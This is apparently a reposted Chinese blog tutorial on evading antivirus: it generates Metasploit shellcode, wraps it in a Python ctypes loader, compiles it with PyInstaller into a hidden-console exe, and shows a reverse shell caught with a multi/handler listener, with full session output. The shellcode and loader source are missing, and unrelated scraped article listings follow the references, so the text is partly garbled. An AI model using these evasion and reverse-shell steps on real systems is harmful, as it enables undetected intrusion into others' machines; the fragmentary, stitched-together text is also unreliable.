Metasploit - Tips for Evading Anti-Virus
绕过杀毒软件,有很多钟方法。此处介绍一种,编写python程序调用shellcode,并使用Pyinstaler将python程序编译为exe程序。 |
准备工作:(Windows XP环境下编译) |
将Python程序编译为exe,须要Python主程序,pywin32库,Pyinstaller(直接解压到C盘)。 假设编译过程中出现错误提示,请依照指示解决这个问题。 安装过程不是非常复杂,在此不予说明。 |
https://www.python.org/ftp/python/2.7.8/python-2.7.8.msi |
利用metasploit生成shellcode。供后面的python程序使用。 |
msf payload(shell_bind_tcp) > show options |
准备完毕后。python程序源代码例如以下: |
from ctypes import * |
利用Pyinstaller编译上述包括shellcode的python文件,命令例如以下: |
C:\PyInstaller-2.1\utils>pythonmakespec.py --onefile --noconsole shellcode.py |
wrote C:\PyInstaller-2.1\utils\shellcode.spec |
C:\PyInstaller-2.1\utils>pythonbuild.py shellcode.spec |
59 INFO: Testing for ability to set icons, version resources... 69 INFO: ... resource update available 79 INFO: UPX is not available. 109 INFO: Processing hook hook-os 259 INFO: Processing hook hook-time 259 INFO: Processing hook hook-cPickle 349 INFO: Processing hook hook-_sre 509 INFO: Processing hook hook-cStringIO 639 INFO: Processing hook hook-encodings 660 INFO: Processing hook hook-codecs 1171 INFO: Extending PYTHONPATH with C:\PyInstaller-2.1\utils 1171 INFO: checking Analysis 1171 INFO: building Analysis because out00-Analysis.toc non existent 1171 INFO: running Analysis out00-Analysis.toc 1171 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable 1171 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww ... 1171 WARNING: Assembly not found 1180 ERROR: Assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww not found 1220 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\python.exe 1230 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww ... 1230 WARNING: Assembly not found 1230 ERROR: Assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww not found 1351 WARNING: lib not found: MSVCR90.dll dependency of C:\WINDOWS\system32\python27.dll 1351 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\_pyi_bootstrap.py 1381 INFO: Processing hook hook-os 1401 INFO: Processing hook hook-site 1421 INFO: Processing hook hook-encodings 1562 INFO: Processing hook hook-time 1562 INFO: Processing hook hook-cPickle 1661 INFO: Processing hook hook-_sre 1822 INFO: Processing hook hook-cStringIO 1961 INFO: Processing hook hook-codecs 2463 INFO: Processing hook hook-pydoc 2632 INFO: Processing hook hook-email 2713 INFO: Processing hook hook-httplib 2763 INFO: Processing hook hook-email.message 2844 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\pyi_importers.py 2904 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\pyi_archive.py 2963 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\pyi_carchive.py 3043 INFO: Analyzing C:\PyInstaller-2.1\PyInstaller\loader\pyi_os_path.py 3043 INFO: Analyzing shellcode.py 3114 INFO: Hidden import 'codecs' has been found otherwise 3114 INFO: Hidden import 'encodings' has been found otherwise 3114 INFO: Looking for run-time hooks 3154 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\select.pyd 3203 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\unicodedata.pyd 3273 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\_hashlib.pyd 3323 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\bz2.pyd 3414 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\_ssl.pyd 3484 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\_ctypes.pyd 3555 WARNING: lib not found: MSVCR90.dll dependency of C:\Python27\DLLs\_socket.pyd 3575 INFO: Using Python library C:\WINDOWS\system32\python27.dll 3625 INFO: Warnings written to C:\PyInstaller-2.1\utils\build\shellcode\warnshellcode.txt 3634 INFO: checking PYZ 3634 INFO: rebuilding out00-PYZ.toc because out00-PYZ.pyz is missing 3634 INFO: building PYZ (ZlibArchive) out00-PYZ.toc 4815 INFO: checking PKG 4815 INFO: rebuilding out00-PKG.toc because out00-PKG.pkg is missing 4815 INFO: building PKG (CArchive) out00-PKG.pkg 6167 INFO: checking EXE 6167 INFO: rebuilding out00-EXE.toc because shellcode.exe missing 6167 INFO: building EXE from out00-EXE.toc 6167 INFO: Appending archive to EXE C:\PyInstaller-2.1\utils\dist\shellcode.exe |
编译完毕后,将shellcode.exe放到目标主机上运行,成功获取反弹shell。 |
msf exploit(handler) > set payload windows/shell/reverse_tcp payload => windows/shell/reverse_tcp msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (accepted: seh, thread, process, none) LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > set LHOST 192.168.1.107 LHOST => 192.168.1.107 msf exploit(handler) > run [*] Started reverse handler on 192.168.1.107:4444 [*] Starting the payload handler... [*] Encoded stage with x86/shikata_ga_nai [*] Sending encoded stage (267 bytes) to 192.168.1.112 [*] Command shell session 1 opened (192.168.1.107:4444 -> 192.168.1.112:2061) at 2014-08-28 12:51:54 +0800 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\PyInstaller-2.1\utils> |
參考链接:
http://pen-testing.sans.org/blog/pen-testing/2011/10/13/tips-for-evading-anti-virus-during-pen-testing
https://community.rapid7.com/community/metasploit/blog/2014/03/26/new-metasploit-49-helps-evade-anti-virus-solutions-test-network-segmentation-and-increase-productivity-for-penetration-testers
http://www.scriptjunkie.us/2011/04/why-encoding-does-not-matter-and-how-metasploit-generates-exes/
http://schierlm.users.sourceforge.net/avevasion.html
http://www.pentestgeek.com/2012/01/25/using-metasm-to-avoid-antivirus-detection-ghost-writing-asm/
Metasploit - Tips for Evading Anti-Virus的更多相关文章
- BlackArch-Tools
BlackArch-Tools 简介 安装在ArchLinux之上添加存储库从blackarch存储库安装工具替代安装方法BlackArch Linux Complete Tools List 简介 ...
- Automated Memory Analysis
catalogue . 静态分析.动态分析.内存镜像分析对比 . Memory Analysis Approach . volatility: An advanced memory forensics ...
- jmeter工具下载及工具功能操作介绍
本博文jmeter介绍的是在windows下使用,linux后期看情况更新,谢谢 简单介绍,想更多了解的去官方,多的很: The Apache JMeter™ application is open ...
- QUICK START GUIDE
QUICK START GUIDE This page is a guide aimed at helping anyone set up a cheap radio scanner based on ...
- cygwin 扩展
1.使用setup,然后一路安装到select package,选择需要的包即可,然后一路next. 2.setup.exe -q -P 包名, 详细用法如下: Command Line Option ...
- Mysql Communications link failure 问题的解决
问题现象 com.mysql.jdbc.exceptions.jdbc4.CommunicationsException: Communications link failure The last p ...
- 使用JMeter3.0实战之分布式并发测试以及web API接口测试
简介: 该文档是以Apche JMeter-3.0为例进行编写的,通过网上的学习资料和官方文档的说明手册学习后,进行项目操作实践,将测试的过程记录下提供给大家学习. 本博文的内容主要是进行配置JMet ...
- 各种WAF绕过手法学习
原文:https://mp.weixin.qq.com/s/aeRi1lRnKcs_N2JLcZZ0Gg 0X00 Fuzz/爆破 fuzz字典 1.Seclists/Fuzzing https ...
- metasploit 渗透测试笔记(基础篇)
0x00 背景 笔记在kali linux(32bit)环境下完成,涵盖了笔者对于metasploit 框架的认识.理解.学习. 这篇为基础篇,并没有太多技巧性的东西,但还是请大家认真看啦. 如果在阅 ...
随机推荐
- 强化学习(2)----Q-learning
1.Q-learning主要是Q表: 当前状态s1,接下来可以有两个动作选择,看电视a1和学习a2,对于agent人来说,可以根据reward来作出决策(Policy).目的就是得到奖励最大. Q-l ...
- 多任务-进程之PID
1.进程pid,如何在程序中获取我们的进程号,从而查看当前的进程 # -*- coding:utf-8 -*- from multiprocessing import Process import o ...
- go语言简单的执行shell命令
package main import( "fmt" "os/exec" "os" "string ...
- POJ 1198 / HDU 1401 Solitaire (记忆化搜索+meet in middle)
题目大意:给你一个8*8的棋盘,上面有四个棋子,给你一个初始排布,一个目标排布,每次移动,可以把一个棋子移动到一个相邻的空位,或者跨过1个相邻的棋子,在保证棋子移动不超过8次的情况下,问能否把棋盘上的 ...
- 虚拟机virtualbox,直接复制本机虚拟硬盘vdi使用, 会提示错误的解决方法
提示语句为: 打开硬盘文件D:\Virtualbox\debian9 - 副本.vdi 失败. 明细(D) Cannot register the hard disk ‘D:\Virtualbox\d ...
- 微信小程序 分享海报
const app = getApp(); const template = require('../../template/templates.js'); Page({ /** * 页面的初始数据 ...
- 动态Axios配置
推荐使用Vue-cli工具来创建和管理项目,就算刚开始不熟悉,用着用着便可知晓其中的奥妙.前一段时间官方所推荐的数据请求插件还是Vue-resource,但现在已经变了,变成了Axios,不用知道为什 ...
- 小贝_php源代码安装
PHP安装 一.本文档相关文件下载 二.php安装 一.本文档相关文件下载 1.php下载地址: http://php.net/downloads.php (备注: 本文档下载的是php版本号为ph ...
- Java单例你所不知道的事,与Volatile关键字有染
版权声明:本文为博主原创文章,未经博主允许不得转载. 如果问一个码农最先接触到的设计模式是什么,单例设计模式一定最差也是“之一”. 单例,Singleton,保证内存中只有一份实例对象存在. 问:为什 ...
- hdoj--2516--取石子游戏(博弈)
取石子游戏 Time Limit: 2000/1000 MS (Java/Others) Memory Limit: 32768/32768 K (Java/Others) Total Subm ...